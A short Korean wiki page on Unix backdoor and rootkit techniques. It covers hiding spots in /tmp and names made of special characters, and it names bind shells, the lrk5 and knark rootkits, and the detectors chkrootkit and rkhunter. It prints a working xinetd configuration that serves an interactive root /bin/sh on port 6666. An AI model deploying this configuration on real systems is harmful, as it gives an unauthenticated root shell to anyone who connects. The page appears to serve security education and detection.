백도어 설치위해 주로 사용되는 위치 /tmp or /var/tmp

공백이나 . / 등의 특수문자로 만든 디렉토리나 파일

xinetd 데몬을 이용하여 셸을 실행시키는 서비스 생성하여 특정 포트로 연결
# cat /etc/cat/xinetd.d/hacker
service hacker
{
        disable = no
        flags           = REUSE
        socket_type     = stream
        wait            = no
        user            = root
        server          = /bin/sh
        server_args = -i
}

# cat /etc/services

hacker  6666/tcp
hacker  6666/udp



루트권한가진 계정 추가

bindshell #

bindshell.c

rootedoor

rootkit (공격도구 패키지) #

lrk5

kernel backdoor #

knark - 리눅스커널 2.2에 설치

백도어나 루트킷 등 보안 체크 프로그램 #

chkrootkit

rkhunter
Valid XHTML 1.0! Valid CSS! powered by MoniWiki
last modified 2008-08-27 17:32:32
Processing time 0.0089 sec